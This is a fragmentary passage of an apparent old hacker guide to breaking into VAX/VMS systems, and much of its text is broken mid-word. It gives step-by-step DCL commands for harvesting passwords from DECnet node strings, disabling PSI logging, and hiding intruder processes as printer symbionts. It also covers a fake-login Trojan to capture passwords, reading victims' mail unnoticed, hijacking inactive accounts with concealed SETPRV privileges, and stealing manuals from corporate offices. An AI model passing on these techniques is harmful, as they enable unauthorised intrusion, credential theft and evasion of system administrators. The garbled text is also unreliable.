exampl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mainuaf"=sbsu"system manager"::sys$system:sysuaf.d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important part is the info in quotes after the node name. The first i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before the space) is a username, and the word after the space is the passw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is rare to find such an occurrence, but it should not be overlooked, si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can sometimes yield high system level accounts.  In this example, node SBS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s a user called SYSTEM, who's password is MANAG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CNET and PS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do a SHOW NET and it gives you a list of other nodes, you can connec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se nodes using the SET HOST command. For example to connect to node SBSU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et host sbs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then connect you to SBSU, and you have to go through their log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cedure also.  An interesting trick to note is, lets suppose that you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cked an account out on node SBSU.  What you want to find out is the DATAPA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TELENET address of the machine.  To do this us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mc ncp tell sbsu sh known d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then give you the address of the machine, so that you can call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ly rather than through this VAX.  You may want to do this to incre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ed, since obviously calling through another VAX slows things down a b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other method which often works is to use the SHOW LOGICAL command. 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ifying a certain table, you can sometimes get a list of the NUAs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nodes in the same cluster as your node.  To do this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how logical/table=*psi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 alternative method which is a bit messy and requires higher privileges i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pe out the NETCIRC.DAT file. i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type sys$system:netcirc.d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all the systems that I have seen, none of them had WORLD READ access to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, so it is not possible to read this with just TMPMBX and NETMBX privileg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y times you will want to call a phone number to another machine. To do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et host/dte txa0: /dial=number:55512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command will dial out to 555-1212 using the terminal TXA0:  To dial out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one number, you MUST specify a terminal that is hooked up to a modem. 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d out which terminals have modems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how de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give you a list of devices hooked up to the VAX. Devices are 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acter strings followed by a colon (:) The terminals that you can use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ually further down the list.  To test the terminal for a modem, us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ing line, which also illustrates the importance of lexical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write sys$output f$getdvi("txa0","tt_modem"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above line would test the terminal TXA0: to see if it has a modem attach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it responds with TRUE, then you have a modem, otherwise not. Note that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t put the terminal name in quotes, and also that you DO NOT enter the col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the VAX you have hacked onto is hooked up on a packet switching system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DATAPAC or TELENET, then there is another USEFUL thing you can perform.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ll out NUA's use the /X29 qualifier. For exampl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et host/x29 02624540005057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ould call up the NUA 026245400050570 (altos:tchh).  What is interes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note is that on many VAX's you can call out to foreign remote nodes such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example and the charge for the collect call is placed to the accou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ough which you are logged in as.  This is a safe and easy method to call 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PSDN's which are normally long distance from you.  It should be noted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y system managers turn off foreign DNICs, which may limit you to cal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ly within your local DNI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ne precaution you may want to take when using the SET HOST/X29 command i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rn off logging.  Although this is usually turned off, some system manag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y buffer everything you type in and keep it in a file. To temporarily tu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ogging off, try thi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run sys$system:psip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will then ask for NODE:  just hit RETURN, the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SI&gt;show log_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either say that buffering is off or it will give you a filename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directory path. If it is not off then make a note of the file, then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SI&gt;set nolog_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turn off the buffering. After you are through with the remote ses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sure to turn it back on with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SI&gt; set log_file xxxx:[xxxx.xxxx]xxxxx.xx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the xxx's represent the full filename path that you initially wrote d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ou did the SHOW LOG_FILE comm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 want to point out another interesting trick that sometimes works on cert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ounts. Many a time i have encountered an account on a Vax which would simp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ow you to call out to another node. It had no other purpose, and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fuse to give you DCL access.  If you encounter such an account and it as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to enter a nodename, try putting /x29 NUA.  This technique allows you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al out to remote systems via some PSS even though you do not have DCL acces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 exampl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nodename&gt; /x29 02624540005057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/X29 isn't disabled, this will allow you to call that NU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thing to note is that not all systems allow you to call out using the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thods. Some have /x29 disabled, others have /dial disabled etc.  In order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vercome this barrier, it is important to know which files are involved. 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want to dial out, you MUST have the modem files (such as DMCL). If you w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dial out across a PSS, you must have the PSI utility files, and lastly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wish to dial out to another node in the cluster you must have RTPAD.EXE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ocal node and REMACP.EXE and RTTDRIVER.EXE on the remote no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quick note about finding other VAXes that have PSI utilities on them. Oft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may want to hack only those VAXes that have PSIPAD on them.  To determ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a particular VAX in your cluster has the capability, issue the comman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dir NODE::sys$system:psi*.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DE stands for the nodename that you want to check.  If this returns with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ssage that no files match, then this particular VAX does not have PS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talled.  If on the other hand it returns with several file names, then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es have the PSI utilities install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just a VERY brief overview of the DECnet setup on VAX/VMS systems. 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more detailed analysis, look for my other file: 'Understanding DECnet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CP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DING ON TH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are several methods that allow you to remain undetected once you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cked onto a VAX.  One of the most important things is to leave things as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, in other words, do not delete files or subdirectories.  You should al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void leaving suspicious looking COM or EXE files that you may have cre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 important ability to have is being able to hide from SHOW USER. There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eral ways of going about this, but the simplest is to becom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n-interactive process. Or to become a subprocess of some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n-interactive process such as a BATCH or NETWORK process.  Although this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de you from SHOW USERS, you will still be visible if someone did a SH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. To get around this you should also specify your process name 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nter driver or something. For exampl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how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ok for the process that has a name of "SYMBIONT_xxxx" where xxxx is a numb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se are the printer drivers on the system.  Look for the last number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st and then change your own process to one higher than this number. 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ample if the last printer is 5 then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et proc/name="SYMBIONT_0006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the end of this file i have enclosed a small 20 line assembler program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enter through EDIT.  It allows you to hide from SHOW USER by chang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process to an OTHER non-interactive process. After you assemble the fil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k it and then execute it using the RUN command. You should then copy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 to some rarely used directory, where no one else will notice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PROCES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o you have hacked your way in, and everything is going smooth. Now you w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find out what all the other people on the system are doing.  There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eral ways of finding out who else is using the system and what they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ing. Here i will outline some of the basic metho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Perhaps the simplest command that you can issue to see who else is logged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the SHOW USER comm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how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typical output might look lik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VAX/VMS Interactive Us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1-SEP-1989 12:48:51.1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Total number of interactive users=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ID        Username    Process Name     Termi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2000B3      DELUCAJ     DELUCAJ          VTA21:      TTA7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4000C4           _vta13:          VTA13:      LTA8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400138      OPERATOR    system monitor   VTA17:      OPA0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40013D      POLLACK     POLLACK          VTA11:      TTB0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4000BC      ENTITY      FUK YOO          VTA15:      TTA1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k so what does all this mean?! Well lets go one column at a time. The fi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lumn gives you your process identification number. This is a unique nu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is assigned to each process as it logs in.  The number itself re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esn't matter, however it is required for certain commands.  The next colum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the username of the process. This always puts the name of the account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logged in with.  Sometimes you may notice that instead of a name it sa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is indicates that someone is currently going through the log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cedures under that PID.  The next column is the process name. Thi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faulted to be the same as your username, but can easily be changed.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ampl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et proc/name="Hacker!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set your process name to Hacker!  Since everybody will see this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do a SHOW USER command, it is not recommended that you choose some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will give you away. In general, you leave this as the default.  The nex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lumn shows the virtual terminal that you are logged into.  The last colum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s the physical terminal that you are logged into. It is important to che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last column.  You should check to make sure that nobody is logged in un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A0:  Anyone logged in under this is using the system console, which mea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they could possibly be watching you!  Another one to note is RTxx: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icates a process that is remotely logged in (ie calling in from an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X or something)  Other things that you should watch out for are users who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gged in under the SYSTEM account or any other high-privileged accounts.  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of OPERATOR,OPER,SYSTEM,SYSMGR etc could mean trouble for the hack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ne thing that you may notice on some systems is that a process will be logg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ALL the time under the OPA0: terminal.  What's going on?! Is th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ager there all the time?  No. What happens on many systems is tha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manager logs into his terminal, and doesn't bother logging out a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d of the day, leaving his process running often for weeks at a time. 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no easy way to know if the guy is really there or not.  There are two thin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do. One is to check the time that the account has been IDLE, but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no easy way to check this without going into some programming.  The nex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st you can do is issue the SHOW SYSTEM command.  This will show all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cesses currently running, their priority levels, how much CPU time they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ting up etc. A typical report may look lik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how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X/VMS X2EN  on node DELPHI  01-SEP-1989 15:10:31.02   Uptime   0 12:06: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Pid      Process Name   State  Pri     I/O      CPU        Page flts  Ph. M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2200080   NULL           COM    0         0    0 16:34:12.00        0       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2200088   SWAPPER        HIB    16        0    0 00:03:52.53        0       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2200113   ENTITY         LEF    4     16505    0 00:00:12.02     8689      23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etc et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display can give you several important pieces of information about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cesses. The explanation of each colum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ID       - the process identification nu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c Name - the name of the process. Note that certain non-interactiv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processes such as NULL, SWAPPER, ERRFMT etc are always running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backgr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TE     - This is important.  This tells you what the process is current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doing.  HIB-hibernating, COM-computing, LEF-active, CUR- curr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ORITY  - the higher the priority number, the higher priority it has in ter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of accessing CPU ti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/O       - Shows the accumulation of the direct I/O and buffered I/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PU       - the total amount of CPU time the process has used so f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GE FLTS - page faults, number of exceptions generated. Not very useful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. MEM   - amount of physical memory that the process occup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further thing you may notice after the last column on some processes i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ngle letter. This is the process indicator, and it can be one of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 - batch jo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 - subpro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 - network pro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other useful option is the ability to know which files, each of the proces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accessing. To accomplish this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how devices/files/no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only problem with this command is that it will not show the filename i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 not have read access to it. (or the BYPASS privileg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haps the most POWERFUL tool that the VAX/VMS hacker has is the System Dum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alyzer (SDA).  An important option of this allows you to view all the pro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unning on the system, what files they are accessing, their process statu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ntents of their virtual memory (such as keyboard buffer) etc etc  A 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werful command, it is started with the comman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analyze/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only drawback with this command is that it requires the CMKRNL privile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will discuss this feature in more detail later in the fi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ACHED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very big security loophole which is allowed on many VMS systems are detach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ounts.  Basically what this allows you to do is cut carrier instead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gging out properly.  Instead of logging the process out, it is left wai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he system.  The next user who logs in, instead of getting a Username promp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get your shell ($) prompt!  There are many useful things you can do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detached account.  The most obvious use of course is to set up a Trojan Hor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. Basically you write a procedure that simulates the VAX/VMS log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quence.  After the user enters his/her username-password, you save this inf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a file, give him a 'User authorization failure' and throw him into the re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gin sequence.  He will think he mistyped something and this time when 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ies, he will be able to log in normally. But in the meantime, you have a cop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his username/password combination stored away in a file, which you can l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AMINING FI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ten it becomes necessary to examine a file in greater detail than provid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imple TYPE command.  For executable and object files there is of cours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ALYZE/IMAGE and ANALYZE/OBJECT commands, but often you want to have a look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ch individual byte in the file.  The best way to do this is to use the DUM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.  An exampl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dump test.d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UMP of file DISK0:[NORMAN]test.dat  on  15-APR-1989  15:43:26.0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 ID (3134,818,2)   End of file block 1 / Allocated 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rtual block number 1 (00000001), 512 (0200) by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06d6173 20612073 69207369 68540033 3.This is a samp 000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3752065 62206f74 20656c69 6620656c le file to be us 0000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1786520 504d5544 2061206e 69206465 ed in a DUMP exa 00002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0000000 00000000 0000002e 656c706d mple............ 0000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0000000 00000000 00000000 00000000 ................ 00004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0000000 00000000 00000000 00000000 ................ 0001E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0000000 00000000 00000000 00000000 ................ 0001F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you can see, this not only shows the ASCII interpretation, but also the H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lue for each byte.  This can be VERY valuable in certain situations. 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uld note that since the default is HEXADECIMAL LONGWORD, the bytes seem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in a backwords order.  This is due to the way the machine stores numbers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mory: Lo-byte,LSB,MSB,Hi-byte.  You can optionally specify the number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e out in decimal or also in single byte format.  Exampl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dump sbsu::sys$system:rightslist.dat /byte/header/decim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e the online HELP files for more detail into the various qualifiers.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uld note that you CAN use dump to access files on OTHER node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EATING TEXT FI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This isn't the best of places to put this topic, but if I don't do it now,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probably forget later on, so here goe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Often you will need to create files on a system, such as messages to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ckers, notes to yourself, small DCL programs etc. The basic method is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create file.tx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Hi this is a dumb message that i am typing jus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ee how this command work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ically what is happening here is you specify a filename and an exten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using the CREATE command (in this case file.txt) and then the system wai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for you to type in something.  At this point you can type whatever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nt, and to end the message/program/memo just hit CTRL-Z. This will return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he DCL prompt.  This is an easy method to transmit COM files that you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ither created or buffered from some other system.  Just issue the CRE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, send the file through your buffer, then hit CTRL-Z to finish it o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X/VMS MAIL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lthough it is not a good idea to use the MAIL system to send or rece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ssages (since the messages can be read by anyone with enough privs) I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ent a brief list of what it can do.  One important thing to note i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ever there are MAIL messages waiting to be read, they are stored in a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ends with the MAI extension.  So if the account you have logged into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eived mail, and you really want to read it for some reason, then you can d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ollowing from DCL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type mail.ma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file is not necessarily called MAIL.MAI, it could be any other name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MAI extension.  Aside from some header information stored at the beginn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each message, the rest of the message is mostly in standard ASCII and easi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dable.  Doing it this way ensures that the message remains there f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L user when he logs in. (after a message has been read, it is put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other area, and the user will not see it.  This could make him suspicious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 keeps losing important mail messages!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Reading MAIL files can be quite useful, because sometimes important messag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stored here.  Like i stated earlier, you shouldn't be actually using M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read the mail since it will then get deleted, and the actual user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ually notice.  Also, you shouldn't use the MAIL system to s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cker-related information (to other hackers) because system managers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ess your mail and read what you have to s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Basically you can use the MAIL facility in two ways: Interactively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ough the shell.  For ease of use I will only describe the interactive meth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nce it is easier and more flexible.  If you insist on doing it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ll, then just call up the ONLINE HELP for the qualifiers.  In any case,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actively use the MAIL utility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m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respond with the promp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this point you can enter the various mail commands.  Following is a brie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verview of the more important commands and concepts.  At the end, I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vided a table with all the possible commands that can be entered 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res a brief list of the more important MAIL commands that I will discuss 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SEND        DIRECTORY     EXTRA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READ[/NEW]  DELETE        PR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FORWARD     MOVE          HEL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REPLY       SELECT        EX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irst command to try is the SEND command.  Try sending a messag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self Enter the SEND command and press RETURN.  Enter your own user name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rompt and press RETURN.  Enter a subject at the prompt and press RETU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gain. The following example shows how to use the SEND comman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&gt; S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:PIER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bj:Sai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your message below.  Press CTRL-Z when complete, or CTRL-C to qui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ou finish entering the text of your message, press CTRL-Z. Because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sending the message to yourself, MAIL signals that you have just received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message by displaying the following messag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mail on node FLAXEN from PIER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w, you are ready to use the READ command.  To read the message you just s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yourself, enter the READ command with the /NEW qualifier and press RETURN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&gt; READ/N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must specify the /NEW qualifier with the READ command when you want to r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mail that arrives while you are in the Mail Utility.  When you are not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ail Utility and you receive new mail, invoke MAIL to read the new messag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enter the READ command without the /NEW qualifier.  Or, if you wish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d mail that you have already read, you can enter the READ comm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forward a copy of a mail message to another user by enter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WARD command.  MAIL prompts you for the name of the user to receiv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ssage. Try forwarding a copy of the message you just received back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self. Enter your own user name and press RETURN.  Supply a subject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mpted and press RETURN MAIL signals that you have just received a n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ssage. Enter the READ/NEW command to read the forwarded mess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ou receive a message and want to respond to it, enter the REPLY comm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press RETURN.  MAIL displays the header information as follow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&gt; REP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:FLAXEN::PIER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bj:RE: Using the REPLY comm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your message below.  Press CTRL-Z when complete, or CTRL-C to qui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ou finish typing your response, press CTRL-Z.  Again, MAIL signal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have just received a new message.  To read the message, enter the READ/N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ou want to see a list of all the mail messages you have collected, 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IRECTORY command and press RETURN.  MAIL displays a list lik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# From             Date                  Subj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1 FORBES           1-SEP-1989            How to Write a Me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2 SBSU::BERT       2-SEP-1989            Using the Pri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3 FROST::BASTIEN   4-SEP-1989            Chicken Ki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ou want to remove a message, use the DELETE command.  You can ei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the DELETE command while you are reading the message or you can ente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LETE command followed by the number of the message you want to remove. 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move the second message in the list, enter the following command lin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&gt; DELETE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enter the DIRECTORY command after you have deleted a message (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ssages), you see the messages marked for deletion, as follow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# From             Date                  Subj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1 FORBES           1-SEP-1989            How to Write a Mem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2 (Delet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3 FROST::BASTIEN   4-SEP-1989            Chicken Ki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ou exit from MAIL, the messages marked for deletion disappe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ail Utility allows you to organize your messages by moving them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ders.  To move a message to a folder, enter the MOVE command (while you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ding the message) and press RETURN.  MAIL prompts you for a folder n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pe any name, for example, REVIEWS or JOKES or STATUS_REPORTS.  MAIL al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mpts you for a file name.  You can specify the default mail file by pres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TURN.  A sample session demonstrating the MOVE command follow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&gt;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&gt; MO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Folder: HACK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_File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der HACKERS does not exi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 you want to create it (Y/N, default is N)? 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%MAIL-I-NEWFOLDER, folder HACKERS cre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is example, the folder name is HACKERS and the default mail fil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ified.  If the folder you name does not exist, MAIL asks you if you wan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eate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ce you have created folders, you may want to move between them. To move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folder to another, use the SELECT command.  If you want to move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CKERS folder, enter the SELECT command as follow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&gt; SELECT HACK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%MAIL-I-SELECTED, 1 message selec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is example, MAIL displays a message indicating the number of messages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ol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move to a folder named JOKES, enter the following command lin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&gt; SELECT JOK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%MAIL-I-SELECTED, 32 messages selec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enter the DIRECTORY command to see a list of the messages in the fol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just selec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ou want to move a mail message from your mail file to a sequential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you can access from the DCL command level, use the EXTRACT comm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the EXTRACT command (while you are reading the message) and press RETUR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 prompts you for the name of a file.  Then, when you exit from MAIL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 is listed in your directory.  The following example shows how to us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TRACT command to move a mail message to a file named GAMES.D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&gt; EXTRA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_File: GAMES.D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%MAIL-I-CREATED, DISK:[BERGMAN]GAMES.DAT;1 cre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print a hard copy of a mail message, enter the PRINT command while you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ding the message and press RETURN.  (When you exit from MAIL, the mess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s the print queue.) The following example shows how to make a hard copy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ssage #4 by using the PRINT comman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&gt; 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#4          4-AUG-1989 09:39:20           M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:  SPARTA::FELLIN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:    MARST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bj:  Rydell's Reas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reference to the meeting of July 26, I would like to expl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ydell's opinion more fully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&gt; PR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ou are ready to leave MAIL, enter the EXIT command and press RETUR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y messages marked for deletion disappear.  Any messages marked for prin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the print queue and the following message is displaye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&gt; EX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ob MAIL (queue ATLAS_PRINT, entry 43) started on QUEUE$LPA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next section is a detailed look at what is possibly the  most importan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AIL commands -- S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mat:   SEND  [filespec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ds a message to another user(s).  Use the SEND command and the MAIL comm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changeably because they work the same way. MAIL prompts you first f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ame of the user(s) to receive the message.  You reply with the user name(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with the file name of a distribution list file(s), in the following forma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nodename::]username,...] [,] [@listname[,...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have entered the SET CC_PROMPT command or used the /CC_PROMPT qualifi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then specify names of users to receive carbon copies of the message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C: promp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xt, MAIL prompts you for the subject of the mail.  To avoid the "Subj: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mpt specify the /SUBJECT qualifier with the SEND comm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include a file specification with the SEND command.  If you specify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 with the SEND command, the text in that file is sent to the specifi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(s).  If you do not specify a file, MAIL prompts you for the text of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ss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the message that you want to send; then press .  Note that o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have typed a line and pressed RETURN, there is no way to edit it. I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cide not to send a message you are typing but want to stay within the M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tility, press  to abort the message.  You then receive the MAIL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mpt.  CTRL-Z exits you from MAI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amp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AIL&gt; SEND/L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o:FLIGHT::MY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ubj:Geometric Concep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AIL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example shows how to send a copy of the last mail message you sent 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 named Myers on node FL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AIL&gt; SEND/SELF/SUBJECT="Good Harbor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o:DAPPER::WAY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Enter your message below.  Press CTRL-Z when complete, or CTRL-C to qui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example shows how to send a mail message to a user named WAYNE on n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PPER.  The /SELF qualifier enables MAIL to send a copy of the same mess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ck to you.  The subject of the  message  is  Good Harbor. Since the /SUBJ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ualifier was specified, there is no Subject: head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AIL&gt; S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o:BAKER,MARSTON,@SUPERVIS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ubject:Handling Str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Enter your message below.  Press CTRL-Z when complete, or CTRL-C to qui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example shows how to send a mail message to two users (BAKER and MARSTON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a distribution list (SUPERVISORS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of the important concepts relating to MAIL is the idea of FOLDERS. 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 files are subdivided into folders.  By default, your mail file (MAIL.MAI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ains a folder called MAIL.  The MAIL folder contains messages that you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ready read.  When you receive new mail messages, they automatically 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a folder named NEWMAIL.  After you read the messages in the NEWM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der, they automatically move into the MAIL folder and the NEWMAIL fol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appears.  When you delete a message it automatically moves in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TEBASKET folder.  Deleted messages collect in the WASTEBASKET folder unt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empty it.  To emtpy the WASTEBASKET, enter either: EXIT or PURGE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eate as many folders as you want.  You always know which folder you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rrently in because the name of the folder is displayed at the top r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rner of the screen when you enter the READ or DIRECTORY command. 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the DIRECTORY/FOLDER command to see a display of the existing folders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urrent mail file.  (use the MOVE command for creating new folders)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move a folder by deleting all the messages that it contai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look at a sample MAIL heirarch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[mailfile1]        [mailfile2]                 [mailfile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!                  !            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!            +-----+---------+            +----+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[folder1]    [folder1]        [folder2]       !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!            !               !        [wastebasket]  [folder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!          +-+-----+       message1       !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message       !       !                   garbage1       message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message1  message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MAILFILE ---&gt; FOLDERS ---&gt; MESSAG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 COMMANDS OVERVI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re I have provided a listing of all the commands that you can issue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 utility and a brief description of what each one doe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            Descri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+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WER     ! Same as the REPLY command.  See be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ACH     ! Allows you to switch to another process in your jo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CK       ! Displays the last message r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RESS   ! Makes an indexed sequential mail file smal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PY       ! Copy a message to another folder, without deleting origi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RRENT    ! Displays the beginning of the message you are currently rea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FINE     ! Allows you to define keys as macr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LETE     ! Delete a mess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ORY  ! Displays a list of the messages in the current fol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DIT       ! Enables you to edit a message before it is s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RASE      ! Clears the scr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IT       ! Exits from the MAIL ut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TRACT    ! Places a copy of the current message into a sequential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       ! Moves the current message to the specified fol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      ! Displays the first message in the current fol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WARD    ! Sends a copy of the message you just read to another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YPAD     ! Define the keyp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ST       ! Displays the last message in the current fol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L       ! Sends messages to another user.  Identical to the SEND comm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VE       ! Moves the current message to the specified fol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XT       ! Skips to the next message and displays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NT      ! Dumps messages to the PRI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RGE      ! Deletes all messages in the WASTEBASKET fol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UIT       ! Quits MAIL without deleting messages in WASTEBASK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D       ! Displays your messag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PLY      ! Sends a message to the sender of the message you are rea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ARCH     ! Searches the current folder for the message containing a st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LECT     ! Allows you to switch to another fol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D       ! Send a message to another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-SHOW   ! Review or Modify various characteristics of the MAIL ut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AWN      ! Create a sub-process.  Often useful to the hacker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+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ILING PROGRA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ce you are comfortable with the VAX/VMS operating system, you will probab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nt to write yourself some useful little hacker utility programs.  Alth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y can be simply written as DCL script files, often the occasion arises w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use of a high-level language is necessitated.  Through a high-lev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nguage you have full access to the system services, as well as a lot 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rol of what you want the VAX to do.  Here I will very briefly show how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rite, compile and execute a basic program.  Creating executable files in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nguages follows the same overall procedures: To activate basic from the sh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bas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should put you into the VAX-BASIC environment, and the terminal will pr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DY on your screen.  If just typing BASIC doesn't work, you may want to tr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mc bas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sometimes works, but it should be noted that BASIC is not found on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X's.  Some have it, some don't.  In any case, whenever you are editing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, you should never leave source code lying around.  The best way i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dit the file on an online buffer editor, and then transmit the file. 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uld always be done in this manner unless your file is VERY large, and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uld be cumbersome to keep uploading it.  If you must, then to save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eation onto the VAX, just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ve "filename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save the source code with a .BAS extension.  You should rename this &amp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de it in some seldom checked directory.  After you have finalized your co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should create an executable file, download your source code, and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lete the one online.  To create an executable file, first you must exit b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DCL, do this by typing EXIT.  Then once in DCL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compile filename.b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link file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delete filename.obj;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 that you can link multiple OBJ files together, just like in MS-DOS. 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uld also be noted that to create truly useful programs you will need to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hands on a system services manual.  Through the system services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ain all kinds of information about the system and any nodes that it is hook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 t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: type HELP in BASIC to get a complete list of all the commands and synta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AINING MANU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s you can see, if you are going to get anywhere, you will have to get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nds on some manuals.  Perhaps the best book you should invest in is "VAX/V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NALS AND DATA STRUCTURES".  This book concentrates on explaining all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a structures as well as all the system service calls and how every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ically works inside a VAX.  Once you have read and understood this book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X/VMS kernal programming should become a snap.  Its available at most bi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okstores but it costs about $130 (Canadian funds).  You may also want to lo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your local library or University library, since they usually carry this bo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other ones you may want to grab. Aside from these places the next b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ce to get major information is from the actual VAX/VMS manua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fortunately these cannot be bought at any store.  However there are seve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ys you can get your hands on one.  One method is to go work at a comp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uring the summer that uses VAX'es.  Then just grab the manuals or better ye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otocopy them.  (be forewarned though.  Theres several thousand pages worth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ful info!) Or if you know someone else who works at such an establishmen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get them to heist the manuals for you.  Other good techniques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king guided tours of offices of large corporations.  This is the BEST metho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cause you can usually pick up a lot of stuff.  Just make sure you go with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iend (to distract the guide, lookout etc) and carry a school bag with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they get to the computer room, start looking around.  Usually they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the manuals in some big shelf somewhere.  Just grab yourself whatever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ed.  Also keep a lookout for other useful info laying around such as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ounts, dialups etc If you really need to find the number of a VAX and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't see it posted anywhere, then you should get yourself a cheap li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one.  (you know those K-MART $4.99 jobs) Take the phone plug out of the jack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ug in your phone and dial up your local ANI.  This will give you the ph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mber to the dialup.  It should be noted that not all VAX's allow remo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gins.  This can be adjusted from the SYSUAF setup via the AUTHORIZE progra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cal ANI's for TORONTO ar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97-812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97-123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97-169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don't have any Local ANI's, then just ask around on your lo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REAK/HACK boar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EATING/MODIFYING ACC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job of creating, modifying and deleting users is performed via the im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HORIZE.  This program is always found in the sys$system directory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quires at least the SYSPRV privilege.  If you do not have this (or SETPRV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you cannot execute this file.  Assuming you have hacked out an accou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the required privilege or you have via some mechanism boosted your priv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this is how to start up AUTHORIZ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d sys$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run authoriz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return you with the UAF promp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AF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this point you can make modifications to the User Authorization File (UAF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should be noted that the two files that this program accesses are SYSUAF.D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RIGHTSLIST.DAT, and both of these are found in the SYS$SYSTEM directo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, heres the quick and dirty way to create a new user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AF&gt; add username /password=whatever/priv=setpr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basically the minimum requirements for creating a high-privileged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a system.  Of course, you should try and avoid adding new users in w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ssible.  It is a much better idea to try and find an INACTIVE user who hasn'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gged in for quite a while and change their password to whatever you wa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ay, any system operator will not get suspicious because of a n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name.  In addition, when granting privileges to either your own user,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difying some other user, you should NEVER give them ALL privs.  The reason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ple: IT STANDS OUT!  Anybody going through the sysuaf database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mediately pick out such accounts, and you will be found out very quickly. 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must give all privs then the better way is to simply grant the SETPR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vilege as the normal privilege.  (do not assign it as a default however)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son for this is that this will not stand out as much.  By not assigning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a default, if the real user happens to log in for any reason, they will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e it as one of their privs when performing a SHOW PROC/PRIV.  The only wa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tivate your hidden privileges is by issu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et proc/priv=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re I will briefly outline the commands you can perform from UAF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  Descri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    !This as you know will add a new user. You may specify many qualifi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!when creating the account.  See the online HELP for further inform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PY   !Allows you to copy any record in the UAF to a new us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EATE !Allows you to create either the RIGHTSLIST.DAT or NETUAF.DAT files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!they don't already exi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FAULT!Allows you to change any item in the DEFAULT record in SYSUAF.D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IT   !Terminate authorize and go back to the VMS she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ANT  !Grants an identifier name to a user U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ST !Makes a listing file (SYSUAF.LIS) which gives information on the reco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!specified.  MODIFY !Allows you to modify an existing user.  see below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rther discussion REMOVE !This allows you to delete an existing user rec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NAME !This allows you to change the username of a record REVOKE !Revokes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ier name from a username or UIC identifier SHOW !Allows you to view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ords in SYSUAF.DAT, RIGHTSLIST.DAT and !NETUAF.D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mmands you will be using most from here are SHOW and MODIFY.  Show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d to isolate INACTIVE accounts (based on last login), failed login attemp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tc.  The MODIFY command will let you change any characteristic in any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ords.  Below I will give a short discussion on some of the more import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ualifiers that can be specified.  Note that exactly the same thing applie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DD comman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ACCESS  -if the account is set up for no remote access or whatever, j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include this qualifier (no parameters) to gain FULL acc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DEFPRIV -your default privileges.  These are the privileges that are ac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upon log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DIR     -the directory assigned to you upon login.  ie.  SYS$LOG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DEVICE  -the drive that the directory is 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FLAGS   -this is an important one!  You can specify things such as CAP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accounts, NODISUSER, and many oth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LGICMD  -the file that is executed upon login.  Normal setting would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/LGICMD=login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PASSWORD-primary pas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PRIORITY-CPU priority. Normal setting is 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PRIV    -your assigned privileges. Should NOT use ALL, very conspicuou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PWDMIN  -minimum password leng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UIC     -User Identification C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most systems you will find a file called ADDUSER.COM which allows th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ager to create new users.  It is a DCL file which simplifies the task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eating new users by prompting you for all the necessary parameters.  If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 does not exist on the system, here I have outlined the manual method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eating a new user (this is the FULL setup)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sd sys$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run diskquo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: All variables that you must enter are in square brackets, eg. [uic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UOTA&gt;add [uic] /perm=[quota]/overdraft=[overdraft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ically this sets up how much disk space is allotted to the user.  The quo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ually ranges from 1000 blocks to 100000 blocks.  The overdraft is usually 10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quota.  A good setting to keep this at is around 20000 for the quot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create/dir/owner=[uic]/prot=(s,o=rwed,g,w) [directory]/l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add in your directory and set its protec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run authoriz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AF&gt; add [username]/own=[fullname]/acco=[account]/dev=[device]/dir=[directory]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/uic=[uic],[privs]/passw=[passwor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items here ar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name  -the name you will use on the system, eg. SMITHJ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llname  -your actual name, eg John Smith. (of course you don't use your RE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name!!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ount   -your account name, usually used for billing purpo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vice    -the drive that contains your direct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ory -your login directory. Best to keep an existing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ic       -your UIC remember format: [group,member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ssword  -your account password. You can enter whatever you want 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vs     -your account privileges. Normal is TMPMBX and NETMBX.  If you m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then specify SETPRV to give you full access to th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ties up this section.  For further information about a specific qualif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st type HELP from the UAF&gt; promp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RM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rmit is a file transfer program found on most VAX systems.  It allow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nsfer of files over terminal lines from a remote KERMIT program to the lo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RMIT program.  Invoking Kermit can be done in several ways depending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.  Usually the file is located in the SYS$SYSTEM directory.  The usu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thod to start kermit i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kerm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: some machines it may be KERMIT-32 or some other vari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may vary on different machines, you may have to RUN the file, or it m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to be passed parameters such as KERMIT 1200 or KERMIT 2400.  In any c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ce you have initiated the program, you should get a kermit promp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RMIT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re you can issue several different commands. Following is a list with brie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anation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     DESCRI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nect   !connects you to a virtual terminal, issue AT commands from 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it      !return to DC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uit      !return to DCL. Same as abo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eive   !Single file download from another mach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       !identical to rece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e       !terminates a transaction with another kermit in server m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ish    !same as above but doesn't exit to DC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d      !Send a file to another mach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rver    !causes kermit to enter server m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       !set parameters such as parity, delay et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      !show the parameters set up current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tus    !current status such as number of bytes transmitted et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spawn]   !spawn a subpro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local]   !enter VMS comma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ast two commands (in brackets) are not always found on every system,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iefly they allow you to spawn a subprocess (often useful when you are tied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a non-breakable account) and local which can again be used to spawn or iss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DCL commands.  There are often other commands, varying on what version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RMIT is being run.  One important note is that SPAWN cannot be issued from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PTIVE account, but LOCAL (or an equivalent) can.  However, if th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ager is smart he may set up the UAF record to specify that only one pro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be active with that account at any one time.  If this is the case it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ve you a message telling you that you have exceeded the quota allocated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ly way around it is to actually modify the record in SYSUAF.DAT Obviousl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portant commands are SEND,RECEIVE and CONNECT.  Once you issue CONNECT,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dial out long distance or whatever, just by using regular AT comman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D and RECEIVE are self explanatory so I wont go into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CSERV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deserves a little bit of attention also.  Basically DECservers allow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user to easily switch between various nodes in a cluster.  Unless you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gging in directly to a terminal, you will usually not encounter this.  I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, heres what you will se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Username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something of the like.  At this point you should just type A or C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ever else.  It is just a terminal identifier and means absolutely noth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this point you will get a prompt such a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CAL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re you can do a limited number of commands.  The important ones ar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CAL&gt; show us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show the users on the DECserver, and what machines they are connec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etc.  To view all the machines on the server,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CAL&gt; show nod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present a list of the callable nodes.  To connect to any one of the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would issue a command such a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CAL&gt; connect SBS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assuming the nodename was SBSU.  That's basically all there is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Cservers.  The other commands are really not that useful to the beginning VA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cker but can nonetheless be referenced by typing HELP at the LOCAL promp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DUMP ANALYZ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lthough the SDA is not really for beginners, it is such an important top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I thought I would give a really brief overview of what it is all ab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ically to call up SDA, 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analyze/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return you with the promp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DA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this point you can do many great things.  Oh, before I continue, it sh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noted that you need CMKRNL privilege in order to run this program.  In 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se, once you get the SDA prompt, there are several interesting things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.  Basically, SDA is a watching tool.  It lets you keep track of what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cesses on the system are doing.  To get information on another process j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p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DA&gt; show process [username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should put in a person who is logged in where I have put the [username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riable.  This will give you a page of useful information on that specif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cess.  The interesting thing is that with the SDA, you can access any p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memory, unlike EXAMINE from DCL.  You can for example get the PCB addr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a process and then go in and either view or modify things such as priv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ority etc.  You can also view other processes type-ahead buffers, and s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they are doing.  Like I stated earlier, this is a relatively advanc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pic and doesn't fit well into a beginners file, so I will leave it at thi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here I will provide a diagram of the PCB block so that you can see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tes do wha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- SOFTWARE PCB DETAILED LAYOUT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BLOCK 1                           BLOCK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+---------------+        